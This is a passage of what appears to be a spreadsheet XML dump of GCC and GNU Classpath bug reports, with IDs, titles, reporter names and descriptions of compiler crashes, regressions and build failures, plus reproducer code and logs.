../configure --with-gcc-version-trigger=/home/rutt/gcc-20030317/gcc/version.c -\
-host=powerpc-ibm-aix5.2.0.0 --disable-nls --disable-multilib --enable-threads \
--enable-languages=cc++ --norecursion
I'll attach the full log of the build.  But the problem seems to have something to do with the (aix native) linker warnings:
g BFD: .libs/libsupc++.a(tinfo2.o): Unrecognized storage class 111 for .data symb\
ol `_ZTIPKe'
The BFD thing is a little confusing as I don't even have binutils installed.
Release:
3.3 snapshot
Environment:
aix5.2l</t>
  </si>
  <si>
    <t>rutt</t>
  </si>
  <si>
    <t>GCC-27249</t>
  </si>
  <si>
    <t>FAIL: obj-c++.dg/encode-8.mm execution test</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.2/objdir/gcc/testsuite/obj-c++/../../g++ -B/
home/dave/gcc-4.2/objdir/gcc/testsuite/obj-c++/../../ /home/dave/gcc-4.2/gcc/gcc
/testsuite/obj-c++.dg/encode-8.mm  -nostdinc++ -I/home/dave/gcc-4.2/objdir/hppa-
linux/libstdc++-v3/include/hppa-linux -I/home/dave/gcc-4.2/objdir/hppa-linux/lib
stdc++-v3/include -I/home/dave/gcc-4.2/gcc/libstdc++-v3/libsupc++ -I/home/dave/g
cc-4.2/gcc/libstdc++-v3/include/backward -I/home/dave/gcc-4.2/gcc/libstdc++-v3/t
estsuite -fmessage-length=0  -lobjc -I/home/dave/gcc-4.2/gcc/gcc/testsuite/../..
/libobjc    -L/home/dave/gcc-4.2/objdir/hppa-linux/./libstdc++-v3/src/.libs  -L/
home/dave/gcc-4.2/objdir/hppa-linux/./libstdc++-v3/src/.libs -L/home/dave/gcc-4.
2/objdir/hppa-linux/./libiberty -L/home/dave/gcc-4.2/objdir/hppa-linux/./libobjc
/.libs -lobjc -lm   -o ./encode-8.exe    (timeout = 300)
PASS: obj-c++.dg/encode-8.mm (test for excess errors)
Setting LD_LIBRARY_PATH to .:/home/dave/gcc-4.2/objdir/hppa-linux/./libstdc++-v3
/src/.libs:/home/dave/gcc-4.2/objdir/hppa-linux/./libstdc++-v3/src/.libs:/home/d
ave/gcc-4.2/objdir/hppa-linux/./libobjc/.libs:/home/dave/gcc-4.2/objdir/gcc:.:/h
ome/dave/gcc-4.2/objdir/hppa-linux/./libstdc++-v3/src/.libs:/home/dave/gcc-4.2/o
bjdir/hppa-linux/./libstdc++-v3/src/.libs:/home/dave/gcc-4.2/objdir/hppa-linux/.
/libobjc/.libs:/home/dave/gcc-4.2/objdir/gcc:/home/dave/gcc-4.2/objdir/hppa-linu
x/libstdc++-v3/.libs:/home/dave/gcc-4.2/objdir/hppa-linux/libmudflap/.libs:/home
/dave/gcc-4.2/objdir/hppa-linux/libssp/.libs:/home/dave/gcc-4.2/objdir/hppa-linu
x/libgomp/.libs:/home/dave/gcc-4.2/objdir/./gcc:/home/dave/gcc-4.2/objdir/./prev
-gcc:/home/dave/opt/gnu/gcc/gcc-4.1.0/lib
FAIL: obj-c++.dg/encode-8.mm execution test</t>
  </si>
  <si>
    <t>GCC-53526</t>
  </si>
  <si>
    <t>[Coarray] (lib) Properly handle MOVE_ALLOC for coarrays</t>
  </si>
  <si>
    <t>MOVE_ALLOC needs to be properly handled for coarrays.
Cf. F08/0040 at http://j3-fortran.org/doc/year/12/12-006A.txt
and http://j3-fortran.org/pipermail/j3/2012-May/005310.html
and http://gcc.gnu.org/ml/fortran/2012-05/msg00156.html
and http://gcc.gnu.org/ml/fortran/2012-05/msg00166.html
TODO:
- Check whether an (implied) SYNC ALL has to be inserted
  -&gt; The main issue is probably the deallocation of TO
  probably no extra care is required except to ensure that
  the deallocation is properly done.
- Check whether the token is correctly transferred
- Check whether some library action is required.
  -&gt; Probably not.
From F08/0040:
  QUESTION:
    Was it intended that MOVE_ALLOC be applicable to coarrays?
  ANSWER:
    Yes.  A call to MOVE_ALLOC on coarrays might involve the deallocation
    of a coarray therefore MOVE_ALLOC needs to be an image control
    statement.
    Also the corank of FROM and TO needs to be the same.</t>
  </si>
  <si>
    <t>GCC-37005</t>
  </si>
  <si>
    <t>[4.4 Regression] GNAT Bug Box for cd2a24e.adb:37 at tree-vrp.c:392</t>
  </si>
  <si>
    <t>Did not occur with SVN trunk revision 138315 as reported here
http://gcc.gnu.org/ml/gcc-testresults/2008-07/msg02920.html
+===========================GNAT BUG DETECTED==============================+
| 4.4.0 20080801 (experimental) [trunk revision 138517] (sparc-unknown-rtems4.9) GCC error:|
| in set_value_range at tree-vrp.c:392                                    |
| Error detected around cd2a24e.adb:37                                     |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
cd2a24e.adb
/home/joel/work-gnat/svn/gcc/gcc/testsuite/ada/acats/work-sis/support/report.ads
raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:424
End of compilation</t>
  </si>
  <si>
    <t>GCC-37272</t>
  </si>
  <si>
    <t>[4.5 Regression] IRA has caused ppc64-double-1.c to fail</t>
  </si>
  <si>
    <t>As reported at http://gcc.gnu.org/ml/gcc-patches/2008-08/msg02068.html IRA has caused this testcase to fail and it causes a reload to happen.</t>
  </si>
  <si>
    <t>CLASSPATH-24411</t>
  </si>
  <si>
    <t>Viewport width is 1 pixel too small</t>
  </si>
  <si>
    <t>The attached test case shows that the width of the Viewport is 1 pixel too small (1 pixel smaller than the view it is displaying) and this causes problems in JViewport.scrollRectToVisible.</t>
  </si>
  <si>
    <t>GCC-1221</t>
  </si>
  <si>
    <t>Internal error: segfault on invalid cast</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;suspended
State-Changed-Why: Waiting for the source code to be sent.
</t>
  </si>
  <si>
    <t>mkgardne</t>
  </si>
  <si>
    <t>GCC-47232</t>
  </si>
  <si>
    <t>Confusing ObjC error message attributes may not be specified before before â€˜classâ€™</t>
  </si>
  <si>
    <t>The following ObjC testcase:
__attribute__ ((deprecated)) @class A
triggers the error
test5.m:1:30: error: attributes may not be specified before before â€˜classâ€™
which is clumsy.  It is due to c-parser.c producing the error attributes may not be specified before which is then joined with before 'class'.
Thanks</t>
  </si>
  <si>
    <t>GCC-10245</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ?: operator requires public copy constructor of return type</t>
  </si>
  <si>
    <t xml:space="preserve">From: Wolfgang Bangerth 
To: Janis Johnson 
Cc: gcc-gnats@gcc.gnu.org
Subject: Re: c++/10245
Date: Thu 27 Mar 2003 11:52:03 -0600 (CST)
 &gt; &gt; PR 10245 might be a target for your regression finder. I bet it's a 
 &gt; &gt; relatively small patch that causes this.
 &gt; 
 &gt; OK I've started a hunt using a starting range of the 3.1 branchpoint
 &gt; and the 3.3 branchpoint.  If you've got a narrower interval I can use
 &gt; that but otherwise it just means that the hunt runs for an extra
 &gt; hour or so.
 It's between 2003-01-17 and 2003-01-30 that this started.
 W.
 -------------------------------------------------------------------------
 Wolfgang Bangerth             email:            bangerth@ticam.utexas.edu
                               www: http://www.ticam.utexas.edu/~bangerth/
</t>
  </si>
  <si>
    <t>GCC-77904</t>
  </si>
  <si>
    <t>[ARM Cortex-M0] Frame pointer thrashes registers if assembly statements with sp clobber are used</t>
  </si>
  <si>
    <t>In some very specific cases frame pointer can thrash caller's r7 (frame pointer) register. The following test case demonstrates the problem.
---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ----
$ cat test.cpp 
void removeStackFrame(const void* const savedStackPointer)
{
  __asm volatile (MSR psp %0\n : : r (savedStackPointer) : sp)
}
$ arm-none-eabi-gcc -mcpu=cortex-m0 -mthumb -O2 test.cpp -c
$ arm-none-eabi-objdump -S test.o 
test.o:     file format elf32-littlearm
Disassembly of section .text:
00000000 :
   0:	af00      	add	r7 sp #0
   2:	f380 8809 	msr	PSP r0
   6:	46bd      	mov	sp r7
   8:	4770      	bx	lr
   a:	46c0      	nop			 (mov r8 r8)
---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ---- 8&lt; ----
As you can see in this particular function the frame pointer thrashes caller's r7 which should be saved on stack and restored before returning. In this test case this seems to be caused by the sp clobber in the assembly statement (this particular line comes from CMSIS headers for ARM Cortex-M microcontrollers) - if I remove this clobber then the frame pointer is omitted and the problem is gone but this can hardly be considered a solution...
This is somehow specific only to ARM Cortex-M0 - selecting ARM Cortex-M4 (-mcpu=cortex-m4) causes r7 to be pushed to the stack.
This is not related to optimization level as the same behaviour can be observed on all optimization levels.
Using -fomit-frame-pointer doesn't change anything but doing the opposite -fno-omit-frame-pointer - causes r7 to be stacked.
This problem was not present on GCC 5.3.1 (at least on the version with ARM patches) - with that version the frame pointer was omitted. Currently I'm observing this problem on almost clean GCC 6.2.0 - the only change is the multilib configuration.</t>
  </si>
  <si>
    <t>freddie_chopin</t>
  </si>
  <si>
    <t>GCC-17889</t>
  </si>
  <si>
    <t>gcc 3.4 branch does not build for arc-elf32</t>
  </si>
  <si>
    <t>Building gcc for arc-elf32 breaks. I had earlier submitted a patch for this at 
http://gcc.gnu.org/ml/gcc-patches/2004-09/msg00521.html
Resubmitting this for the 3.4 branch here. Could someone apply this in the
source tree ? This needs to also be applied in the head. 
This had earlier been reported at Bug #11043</t>
  </si>
  <si>
    <t>GCC-20511</t>
  </si>
  <si>
    <t>[4.0 Regression] Bootstrap failure because of aliased symbols</t>
  </si>
  <si>
    <t>It seems bootstrap is now broken on ia64:
/home/jim/gcc/gcc/gcc/config/ia64/unwind-ia64.c:2390: error:
'__libunwind_Unwind_FindTableEntry' aliased to external symbol
'_Unwind_FindTableEntry'</t>
  </si>
  <si>
    <t>phython</t>
  </si>
  <si>
    <t>GCC-31841</t>
  </si>
  <si>
    <t>[4.2 regression] bogus is used uninitialized (warning in dead code)</t>
  </si>
  <si>
    <t>Compiling the code below with -O2 -Wall produces the buggy warning
mentionned in the subject.
g++ 4.1 and 4.3 do not have this problem.
The code below is pretty minimal (extracted from CGAL).
For example removing the derivation from the Empty_class
removes the buggy warning.
----------------
struct Empty_class {}
struct C : Empty_class {}
struct M {
  static C f() { return C() }
}
struct R {
  C c
  R() 
    : c(M::f()) {}
}
int main()
{
  R r
  return 0
}
--------------------</t>
  </si>
  <si>
    <t>GCC-57762</t>
  </si>
  <si>
    <t>[4.9 Regression] Memory leak in gfortran.dg/class_array_7.f03 after revision 200084</t>
  </si>
  <si>
    <t>As said in http://gcc.gnu.org/bugzilla/show_bug.cgi?id=56596#c2 I see the following memory leak under valgrind --leak-check=full
==47095== HEAP SUMMARY:
==47095==     in use at exit: 168 bytes in 2 blocks
==47095==   total heap usage: 25 allocs 23 frees 7125 bytes allocated
==47095== 
==47095== 80 bytes in 1 blocks are definitely lost in loss record 1 of 2
==47095==    at 0x100013679: malloc (vg_replace_malloc.c:266)
==47095==    by 0x100001378: __realloc_MOD_reallocate (class_array_7.f03:31)
==47095==    by 0x1000019E6: MAIN__ (class_array_7.f03:55)
==47095==    by 0x100001B7B: main (class_array_7.f03:49)
==47095== 
==47095== LEAK SUMMARY:
==47095==    definitely lost: 80 bytes in 1 blocks
==47095==    indirectly lost: 0 bytes in 0 blocks
==47095==      possibly lost: 0 bytes in 0 blocks
==47095==    still reachable: 0 bytes in 0 blocks
==47095==         suppressed: 88 bytes in 1 blocks
==47095== 
==47095== For counts of detected and suppressed errors rerun with: -v
==47095== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
starting at revision 200085 (no leak at r200083).
Note that I messed up the bracketing in http://gcc.gnu.org/bugzilla/show_bug.cgi?id=56596#c3</t>
  </si>
  <si>
    <t>GCC-69722</t>
  </si>
  <si>
    <t>[6 Regression] gcc/doc/extend.texi:7526: warning: node `Constraints' is next for `Extended Asm' in menu but not in sectioning</t>
  </si>
  <si>
    <t>r233202 gave
/export/gnu/import/git/sources/gcc/gcc/doc/extend.texi:7526: warning: node `Constraints' is next for `Extended Asm' in menu but not in sectioning
/export/gnu/import/git/sources/gcc/gcc/doc/md.texi:1061: warning: node `Extended Asm' is prev for `Constraints' in menu but not in sectioning</t>
  </si>
  <si>
    <t>GCC-45419</t>
  </si>
  <si>
    <t>-fcompare-debug failure at -O3</t>
  </si>
  <si>
    <t>Command line:
$ gcc -fcompare-debug -O3 testcase-min6.i
Compiler output:
$ gcc -fcompare-debug -O3 testcase-min6.i -w
gcc: error: testcase-min6.i: -fcompare-debug failure (length)
Tested revisions:
r163468 - fail
r162940 - OK
r161659 - OK
r161170 - OK
The failure keeps appearing and disappearing when little changes are made - in the original testcase even removing -pipe or adding -save-temps caused the failure to disappear.</t>
  </si>
  <si>
    <t>GCC-65549</t>
  </si>
  <si>
    <t>[4.9 Regression] crash in htab_hash_string with -flto -g</t>
  </si>
  <si>
    <t>lto1: internal compiler error: Segmentation fault
0xa283bf crash_signal
	../../gcc/toplev.c:383
0x111c7b0 htab_hash_string
	../../libiberty/hashtab.c:839
0x6d06bf external_ref_hasher::hash(external_ref const*)
	../../gcc/dwarf2out.c:7763
0x6d06bf hash_table::find_slot(external_ref const* insert_option)
	../../gcc/hash-table.h:652
0x6d06bf lookup_external_ref
	../../gcc/dwarf2out.c:7791
0x6d075d optimize_external_refs_1
	../../gcc/dwarf2out.c:7829
0x6d0788 optimize_external_refs_1
	../../gcc/dwarf2out.c:7833
0x6d0bc6 optimize_external_refs
	../../gcc/dwarf2out.c:7882
0x6d0dfd output_comp_unit
	../../gcc/dwarf2out.c:9122
0x6f6cd9 dwarf2out_finish
	../../gcc/dwarf2out.c:24800
Please submit a full bug report
g++5 (GCC) 5.0.0 20150324 (experimental)
To reproduce clone seastar (https://github.com/cloudius-systems/seastar)
  ./configure.py --compiler /path/to/g++5 --cflags='-flto -D_GLIBCXX_USE_CXX11_ABI=0'
  ninja build/release/tests/tcp_client   # named ninja-build on Fedora)</t>
  </si>
  <si>
    <t>GCC-9983</t>
  </si>
  <si>
    <t>When i try to make the file top.ccthis shows an internal compiler error.
here how this appears after make:
rohan% make
c++ -c -O3 -ffast-math top.cc
In file included from /opt/local/include/c++/3.2/backward/fstream.h:31
                 from top.h:6
                 from top.cc:2:
/opt/local/include/c++/3.2/backward/backward_warning.h:32:2: warning: #warning This file includes at least one deprecated or antiquated header. Please consider using one of the 32 headers found in section 17.4.1.2 of the C++ standard. Examples include substituting the  header for the  header for C++ includes or  instead of the deprecated header . To disable this warning use -Wno-deprecated.
top.cc: In constructor `TreeTopology::TreeTopology(char* char*)':
top.cc:171: Internal compiler error in find_function_data at function.c:329
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [top.o] Error 1
Release:
gcc 3.2
Environment:
unix</t>
  </si>
  <si>
    <t>sameermanagoli</t>
  </si>
  <si>
    <t>GCC-40898</t>
  </si>
  <si>
    <t>STDCALL mangling problem for strings @8 instead of @4</t>
  </si>
  <si>
    <t>There seems to be a problem with mangling STDCALL and BIND(C) see
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/eb7ca487876d9420</t>
  </si>
  <si>
    <t>GCC-19464</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 Regression] gcse causes poor register allocation</t>
  </si>
  <si>
    <t>GCC with gcse enabled generates very poor code for this fragment:
------------------------------------------------------------------------------
int r0 r1 r2 r3 r4 r5
void f (int n)
{
  while (-- n)
    {
      r1 += r0
      r2 += r1
      r3 += r2
      r4 += r3
      r5 += r4
      r0 += r5
    }
}
------------------------------------------------------------------------------
This is code from 3.4.4 with -O2 -fomit-frame-pointer:
.L4:
	movl	16(%esp) %ebp
	movl	12(%esp) %esi
	movl	8(%esp) %ecx
	movl	4(%esp) %edx
	movl	(%esp) %eax
	addl	%edi %ebp
	addl	%ebp %esi
	movl	%ebp 16(%esp)
	addl	%esi %ecx
	movl	%esi 12(%esp)
	addl	%ecx %edx
	movl	%ecx 8(%esp)
	addl	%edx %eax
	decl	20(%esp)
	movl	%edx 4(%esp)
	leal	(%edi%eax) %ebx
	movl	%eax (%esp)
	movl	%ebx %edi
	jne	.L4
And this is with -O2 -fomit-frame-pointer -fno-gcse:
.L4:
	addl	%edi %ebp
	addl	%ebp %ebx
	addl	%ebx %ecx
	addl	%ecx %edx
	addl	%edx %eax
	addl	%eax %edi
	decl	%esi
	jne	.L4
Same applies for 4.0.0 only one should use '-O2 -fomit-frame-pointer
-fno-tree-loop-im -fno-gcse' to get decent code.
This is a regression and was introduced by this change:
2001-07-16  Daniel Berlin  
	* gcse.c: Update comment at top. 
	Update comment on mem handling.
	mem_last_set mem_first_set mem_set_in_block: gone.
	Declaration of reg_set_info: gone.
	(oprs_unchanged_p): Don't use mem_*set_* anymore. They are
	pointless with load_killed_in_block_p (they are *more*
	conservative then it not less and less accurate).
	(oprs_not_set_p): Ditto.	
	(alloc_gcse_mem): Don't allocate mem_set_in_block
	(free_gcse_mem): Don't free it either.
	(record_last_mem_set_info): Update comment in front remove
	mem_*set_* stuff. Note the reason we don't handle stores directly
	here.
	(compute_hash_table): Update comments to reflect reality. Remove
	mem_*set_* references.
	(reset_opr_set_tables): Remove mem_*set_* references.
	(mark_call): Ditto.
	(mark_set): Ditto.  Also remove double sets of bitmaps for REG's.	
	(mark_clobber): Ditto (on both parts we double set here too).
	(expr_killed_p): Remove mem_set_in_block test.
	(compute_transp): Remove mem_set_in_block test.</t>
  </si>
  <si>
    <t>GCC-36059</t>
  </si>
  <si>
    <t>-frepack-arrays: symbols w/ TARGET should not be repacked</t>
  </si>
  <si>
    <t>See thread at
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/e9add97708681397
Full example reported by James Van Buskirk see
http://groups.google.com/group/comp.lang.fortran/msg/9c42edc4620a1cff
Using -frepack-arrays the dummy array x is repacked in the function. This repacking should not happen if the TARGET attribute is present as this can lead to wrong code. (The result symbol point points to the repacked array and not to the original array.)
       function point(x)
         real intent(in) target :: x(:)
         type(C_PTR) point
         real pointer :: p
         p =&gt; x(2)
         point = C_LOC(p)
      end function point</t>
  </si>
  <si>
    <t>GCC-69542</t>
  </si>
  <si>
    <t>[6 Regression] -fcompare-debug failure in simplify-rtx.c on i?86 since r232905</t>
  </si>
  <si>
    <t>r232905 breaks bootstrap on i686-linux with miscompare of simplify-rtx.o.
I'm still reducing testcase for this but have bisected it to this commit already.
Guess either the
 if (regno &gt;= FIRST_PSEUDO_REGISTER &amp;&amp; reg-&gt;subreg_p)
680 	  	         bitmap_set_bit (
or perhaps the whole set_bb_regs function should not be called for DEBUG_INSNs.
I think it shouldn't contain any type != OP_IN regs anyway nor REG_DEAD notes.</t>
  </si>
  <si>
    <t>GCC-56899</t>
  </si>
  <si>
    <t>[4.7 Regression] Wrong constant folding</t>
  </si>
  <si>
    <t>GCC 4.7.2 and 4.8.0 with -O2 option miscompile the following code where
INT_MIN == -2147483648.
  $ cat error.c
  int main (void)
  {
    volatile int v = 10
    int x =  -214748365 * ( v - 1 )
    return ( x == -1932735285 )	/* should return 1 */
  }
  $ gcc error.c -O2
  $ ./a.out
  $ echo $?
  0
The following code with volatile removed from variable v is
correctly compiled.
  $ cat noerror.c
  int main(void)
  {
    int v = 10
    int x =  -214748365 * ( v - 1 )
    return ( x == -1932735285 )	/* should return 1 */
  }
  $ gcc noerror.c -O2
  $ ./a.out
  $ echo $?
  1
The miscompile occurs on options -O1 -fstrict-overflow.</t>
  </si>
  <si>
    <t>GCC-49235</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in int_mode_for_mode at stor-layout.c:424 with -O -fno-delete-null-pointer-checks -fno-tree-scev-cprop -ftree-vectorize -fno-vect-cost-model</t>
  </si>
  <si>
    <t>Created attachment 24398
reduced testcase (the same as gcc.c-torture/compile/pr36817.c)
Compiler output:
$ gcc -O -fno-delete-null-pointer-checks -fno-tree-scev-cprop -ftree-vectorize -fno-vect-cost-model testcase.c 
testcase.c: In function 'foo':
testcase.c:9:10: internal compiler error: in int_mode_for_mode at stor-layout.c:424
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x11c8af0 /mnt/svn/gcc-trunk/gcc/stor-layout.c line=424 function=0x11c8ee0 int_mode_for_mode)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:892
#1  0x0000000000939533 in int_mode_for_mode (mode=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/stor-layout.c:424
#2  0x00000000006bdae2 in emit_move_via_integer (mode=VOIDmode x=0x7ffff5c345e0 y=0x7ffff7ecc470 force=0 '\000')
    at /mnt/svn/gcc-trunk/gcc/expr.c:2921
#3  0x00000000006cb8ea in emit_move_insn_1 (x=0x7ffff5c345e0 y=0x7ffff7ecc470) at /mnt/svn/gcc-trunk/gcc/expr.c:3296
#4  0x00000000006cbc53 in emit_move_insn (x=0x7ffff5c345e0 y=0x7ffff7ecc470) at /mnt/svn/gcc-trunk/gcc/expr.c:3359
#5  0x00000000006ad0bb in copy_to_reg (x=0x7ffff7ecc470) at /mnt/svn/gcc-trunk/gcc/explow.c:608
#6  0x00000000006ae10f in memory_address_addr_space (mode=V4SImode x=0x7ffff5c36438 as=0 '\000') at /mnt/svn/gcc-trunk/gcc/explow.c:480
#7  0x00000000006c49f1 in expand_expr_real_1 (exp=0x7ffff5c319d8 target=0x0 tmode=VOIDmode modifier=EXPAND_WRITE alt_rtl=0x0)
    at /mnt/svn/gcc-trunk/gcc/expr.c:8690
#8  0x00000000006d9cf8 in expand_expr (to=0x7ffff5c319d8 from=0x7ffff5c1fcd8 nontemporal=0 '\000') at /mnt/svn/gcc-trunk/gcc/expr.h:419
#9  expand_assignment (to=0x7ffff5c319d8 from=0x7ffff5c1fcd8 nontemporal=0 '\000') at /mnt/svn/gcc-trunk/gcc/expr.c:4406
#10 expand_assignment (to=0x7ffff5c319d8 from=0x7ffff5c1fcd8 nontemporal=0 '\000') at /mnt/svn/gcc-trunk/gcc/expr.c:4106
#11 0x00000000005e6ce6 in expand_gimple_stmt_1 (stmt=0x7ffff5c37910) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:1953
#12 expand_gimple_stmt (stmt=0x7ffff5c37910) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2050
#13 0x00000000005e86ba in expand_gimple_basic_block (bb=0x7ffff5bb41a0) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:3633
#14 0x00000000005eec67 in gimple_expand_cfg () at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4116
#15 0x000000000085e876 in execute_one_pass (pass=0x16adae0) at /mnt/svn/gcc-trunk/gcc/passes.c:1876
#16 0x000000000085eb65 in execute_pass_list (pass=0x16adae0) at /mnt/svn/gcc-trunk/gcc/passes.c:1930
#17 0x00000000009b398d in tree_rest_of_compilation (fndecl=0x7ffff5bcf000) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:417
#18 0x0000000000614cf5 in cgraph_expand_function (node=0x7ffff5bd4000) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1630
#19 0x000000000061697c in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1689
#20 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1952
#21 0x0000000000616faa in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1126
#22 0x00000000004fe148 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9844
#23 0x0000000000948a74 in compile_file (argc=17 argv=0x7fffffffdb88) at /mnt/svn/gcc-trunk/gcc/toplev.c:586
#24 do_compile (argc=17 argv=0x7fffffffdb88) at /mnt/svn/gcc-trunk/gcc/toplev.c:1923
#25 toplev_main (argc=17 argv=0x7fffffffdb88) at /mnt/svn/gcc-trunk/gcc/toplev.c:1995
#26 0x00007ffff6477cec in __libc_start_main () from /lib64/libc.so.6
#27 0x00000000004e22ed in _start ()
Tested revisions:
r174424 - crash
4.6 r173059 - OK</t>
  </si>
  <si>
    <t>GCC-32819</t>
  </si>
  <si>
    <t>pb_ds/hash_based_containers.html errors</t>
  </si>
  <si>
    <t>from libstdc++-v3/docs/html/ext/pb_ds/hash_based_containers.html
There might be 2 errors in the Hash Table Design document as follows:
==================================
1st Error:
Section : Hash Table Design - Implementation - Probing Tables
Original text :
gp_hash_table is parametrized by Hash_Fn Probe_Fn and Comb_Probe_Fn. As before if Probe_Fn and Comb_Probe_Fn are respectively null_hash_fn and null_probe_fn then Comb_Probe_Fn is a ranged-probe functor. ...
Suggestion text:
gp_hash_table is parametrized by Hash_Fn Probe_Fn and Comb_Probe_Fn. As before if Hash_Fn and Probe_Fn are respectively null_hash_fn and null_probe_fn then Comb_Probe_Fn is a ranged-probe functor. ...
==================================
2nd Error:
Figure: Hash policy class diagram.
Suggestion: null_probe_fn class is missing.
==================================
I have to apologize if they are not errors. 
I am quite new to this forum and my english is very poor.
Chalathip Thumkanon.</t>
  </si>
  <si>
    <t>chalathip</t>
  </si>
  <si>
    <t>GCC-42224</t>
  </si>
  <si>
    <t>[4.5 Regression] 32bit pointers to 32bit pointers abort on 64bit VMS and S390X</t>
  </si>
  <si>
    <t>This is a major bug on VMS it prevents gnatlib compilation. Please fix.
Ubuntu Linux Desktop 8.04 LTS
Target: ia64-hp-openvms8_3
Configured with: ../gcc-head-src/configure --target=ia64-hp-openvms8_3 --prefix=/vmsbuild/gcc/gnatxx --with-local-prefix=/vmsbuild/gcc/gnatxx/local --with-gnu-as --enable-threads=posix --disable-shared --disable-nls --disable-multilib --disable-libssp --disable-libada --disable-decimal-float --disable-fixed-point --enable-checking=release --enable-languages=c --with-gmp-include=/usr/local/include --with-gmp-lib=/usr/local/lib --with-mpfr-include=/us/local/include --with-mpfr-lib=/usr/local/lib
Thread model: posix
gcc version 4.5.0 20091129 (experimental) (GCC) 
--------------
$ ./cc1 foo.c
 to_ptr32 to_int to_ptr32_ptr32
foo.c: In function 'to_ptr32_ptr32':
foo.c:28:3: internal compiler error: in int_or_pointer_precision at tree.c:10583
--------------&gt; Reproducer:
$ cat foo.c
typedef char* __char_ptr32 __attribute__ (( mode (SI) ))
typedef __char_ptr32 *__char_ptr_char_ptr32 __attribute__ ((mode (SI)))
void to_ptr32 (int x)
{
  __char_ptr32 ptr = (__char_ptr32) x
}
void to_int (__char_ptr32 ptr)
{
  int x = (int) ptr
}
__char_ptr_char_ptr32
to_ptr32_ptr32 (char **ptr64)
{
  int argc
  __char_ptr_char_ptr32 short_argv
  for (argc=0 ptr64[argc] argc++)
  short_argv = (__char_ptr_char_ptr32) malloc32
    (sizeof (__char_ptr32) * (argc + 1))
  for (argc=0 ptr64[argc] argc++)
    short_argv[argc] = (__char_ptr32) strdup32 (ptr64[argc])
  short_argv[argc] = (__char_ptr32) 0
  return short_argv
}</t>
  </si>
  <si>
    <t>rupp</t>
  </si>
  <si>
    <t>GCC-38095</t>
  </si>
  <si>
    <t>character ICE</t>
  </si>
  <si>
    <t>Compiling
module bar
implicit none
contains
!
elemental function trim_append(xxyy) result(xy)
character (len=*) intent(in) :: xxyy
character (len=len(xx) + len(yy)) :: xy
xy = trim(xx) // yy
end function trim_append
!
function same(xx) result(yy)
character (len=*) intent(in) :: xx(:)
character (len=len(xx))       :: yy(size(xx))
yy = [xx]
end function same
!
subroutine foo(labels)
character (len=*) intent(in) :: labels(:)
print*size(labels)=size(labels)
end subroutine foo
!
subroutine xmain()
call foo(trim_append([a]same([b])))
end subroutine xmain
!
end module bar
with
gfortran -c xchar_bug.f90
I get
xchar_bug.f90: In function 'xmain':
xchar_bug.f90:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gfortran -v says
gfortran -v
Built by Equation Solution (http://www.Equation.com).
Using built-in specs.
Target: i386-pc-mingw32
Configured with: ../gcc-4.4-20081107-mingw/configure --host=i386-pc-mingw32 --build=x86_64-unknown-linux-gnu --target=i386-pc-mingw32 --prefix=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/gcc/4.4-20081107 --with-gcc --with-gnu-ld --with-gnu-as --disable-shared --disable-nls --disable-tls --with-gmp=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/gmp --with-mpfr=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/mpfr --enable-languages=cc++fortran --with-sysroot=/home/gfortran/gcc-home/binary/mingw32/cross/x86_32/gcc/4.4-20081107 --enable-libgomp --enable-threads=win32 --disable-win32-registry : (reconfigured) ../gcc-4.4-20081107-mingw/configure --host=i386-pc-mingw32 --build=x86_64-unknown-linux-gnu --target=i386-pc-mingw32 --prefix=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/gcc/4.4-20081107 --with-gcc --with-gnu-ld --with-gnu-as --disable-shared --disable-nls --disable-tls --with-gmp=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/gmp --with-mpfr=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/mpfr --enable-languages=cc++fortran --with-sysroot=/home/gfortran/gcc-home/binary/mingw32/cross/x86_32/gcc/4.4-20081107 --enable-libgomp --enable-threads=win32 --disable-win32-registry : (reconfigured) ../gcc-4.4-20081107-mingw/configure --host=i386-pc-mingw32 --build=x86_64-unknown-linux-gnu --target=i386-pc-mingw32 --prefix=/home/gfortran/gcc-home/binary/mingw32/native/x86_32/gcc/4.4-20081107 --with-gcc --with-gnu-ld --with-gnu-as --disable-shared --disable-nls --disable-tls 